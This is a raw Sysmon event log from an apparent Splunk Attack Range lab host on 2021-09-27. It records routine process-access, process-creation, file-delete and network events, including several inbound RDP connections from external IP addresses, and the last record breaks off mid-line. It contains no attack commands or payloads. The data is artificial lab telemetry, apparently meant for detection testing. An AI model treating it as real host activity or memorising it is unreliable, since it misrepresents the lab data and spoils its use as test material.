10341000x8000000000000000980444Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:19:37.468{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980443Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:19:37.468{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980442Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:19:37.468{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980441Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:19:37.468{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980440Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:19:37.468{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980439Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:19:37.468{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980438Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:19:37.468{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980437Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:19:37.468{69CF5F33-7F27-614D-0500-00000000FD01}408524C:\Windows\system32\csrss.exe{69CF5F33-8CA9-6151-FE79-00000000FD01}2440C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000980436Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:19:37.468{69CF5F33-7F29-614D-1D00-00000000FD01}19603060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{69CF5F33-8CA9-6151-FE79-00000000FD01}2440C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000980435Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:19:37.453{69CF5F33-8CA9-6151-FE79-00000000FD01}2440C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{69CF5F33-7F27-614D-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000980434Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:19:37.375{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=22C0F2B4BE6442054726BA6CD2F9794C,SHA256=693B0744DCCAF7F3D87F93B4F35F3810990B22FD014466658FC311D97CCF98B3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980450Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:19:38.578{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=345AB587B80B81705F5780FA4A1BA968,SHA256=99BF11BC8E3E1624D16F3D13039B3FD1D160CEFF08E354B6C0812BDFBE92C86D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980449Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:19:38.578{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=CF842DC2703111A0BE8ADB86A9FEF458,SHA256=D2040D82CBF6B175789E7BBA1DC33C1A7AE5F70A1C9B20B6B9208388BCCA5D0E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980448Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:19:38.390{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=13FA4834DA30A1A8B006EACF611ABC1D,SHA256=475BE19C18C43A0F2A641B953DE92BE40417A624BDA24BBDE8525EF8EFCBC050,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980452Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:19:39.437{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=600015FC4CC8385E68F38A083CC20DFA,SHA256=563A507838B245966051C3E771FD1F53767541118C4887D1CC9B953FCC0A9FAA,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000980451Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:19:35.872{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59481-false10.0.1.12-8000- 23542300x8000000000000000980453Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:19:40.453{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D926FC45A9422A112595150F366D7C6F,SHA256=3A7F443BE8244B9C16DEFEEB9C543D89B766557A79439FC5B0D1EFBF1D8B3C09,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980455Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:19:41.703{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=48175E4D63FCDDC59D7818FE2CBFEDF7,SHA256=17EE476D730A20114B526C46369C99418DA2F500239E0B5791BDC9F669BC0174,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000980454Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:19:37.568{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-54331-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000980456Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:19:42.921{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F2151525C2F6CA0FA9FF067271543C8A,SHA256=2FC15EC7D34B3E25B9ADF1ABBFBD9E64C60E3FCBDCEE85E1BA9CEAE0B377ADF8,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000980458Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:19:41.767{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59483-false10.0.1.12-8000- 23542300x8000000000000000980457Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:19:44.161{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=12B533F52CEBF210016AEDC0A583E2A2,SHA256=1AF9E60405F098E2363BAB4BC9517A36257139FC61A06E6D0E9674815C3783F8,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000980460Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:19:41.928{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse212.102.34.245unn-212-102-34-245.datapacket.com33338-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000980459Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:19:45.395{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=83313B633139759D7B37B17C1A6B1835,SHA256=CD1E1F1325F82050B8971C18E7470DDF6797712782184A2FB769FB5660CA1BA7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980461Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:19:46.458{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=584A8DDD7A0B23660C3E2F5922C9CAF3,SHA256=343303BC7BF991D026D2A480F9D6EBB457145C6BD3A729EC5408C1D0A2A97C42,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980462Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:19:47.473{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4552102C61A7154040A898017525675E,SHA256=40102675F3BA34762DE2858A987B3C635F73F4D54FFDF37BEE9C831F6A48929D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980463Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:19:48.473{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=03964026611CBCF9E0F63D2315A0AC39,SHA256=7682048A54CFDC51E43EDAB58DDF865E9EC9BAB83B72CE0EFF9A03A35E774E11,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980464Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:19:49.489{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F1BF7F68D6FB8EA77EC3D63622E51B6A,SHA256=850DA09BF361C3EEC119EA63A138DF2D5B21889409633B4176981408DEFD122C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980466Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:19:50.489{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=69F8347C05E9D261220CBA6F15A815FC,SHA256=E0895E78E540C9F9B004AF72AFF03D770D95344A9068D17308FE0E80B07070AD,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000980465Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:19:46.816{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-53741-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000980468Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:19:51.504{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E5F8974EF4318FA77F0DBB8DB4B0AB0B,SHA256=FFE7EDAE9EEBCE48A92CFD07CA9590315FCAF59AB44ACB642E9D455AC6765438,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000980467Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:19:47.736{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59486-false10.0.1.12-8000- 23542300x8000000000000000980469Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:19:52.520{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D70B1E033E34B97A34FCE91B3BEA0E64,SHA256=F6107C49F9A9DA23301924AA1666601EE211BAB015448EC73D3FB7AD6194E710,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980472Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:19:53.536{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=665DEA01D777B3D91EA2B7C2A70BF893,SHA256=94EC4762F2365CEE74F66BB6BCA8A55191731FCDB331C793304390F5B7F49947,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980471Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:19:53.083{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=1E4CAD412AC8835E83A1532C7981099C,SHA256=CB74C0E9BBE2D68D9E0FC9B36FC604DE6327B018A226FDEC5D676853DBFB14BA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980470Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:19:53.083{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=188337D50D9E19815397EDDC1C201DBD,SHA256=A325AD0CD062781CBDCECF96F1A36662749E10FA938D49A3ED19051B336A92C0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980476Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:19:54.551{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9C184B101DECFD15BAFBB68BD76C9FE9,SHA256=0A6801F4F0CAD08FB027CB8E589F296C07E1AE89D94F4C6E2FAE172C907A6802,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980475Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:19:54.301{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=1E4CAD412AC8835E83A1532C7981099C,SHA256=CB74C0E9BBE2D68D9E0FC9B36FC604DE6327B018A226FDEC5D676853DBFB14BA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980474Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:19:54.098{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=EFC87C8DA0FE0C05EB176F7BB6773088,SHA256=D54004A52035E929FA31E8C316AE3C68FF767867558EA4E39B132F1153340846,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980473Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:19:54.098{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=345AB587B80B81705F5780FA4A1BA968,SHA256=99BF11BC8E3E1624D16F3D13039B3FD1D160CEFF08E354B6C0812BDFBE92C86D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980479Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:19:55.567{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=050D7711F1CADFFC4685B4356A90C0FB,SHA256=4A3268D19BE5BB7D86E2AFC7519D4210F21511AC3BD015876502851460EA15AA,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000980478Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:19:51.878{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-65152-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 354300x8000000000000000980477Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:19:51.434{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.3.202.198-58535-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000980481Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:19:56.582{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 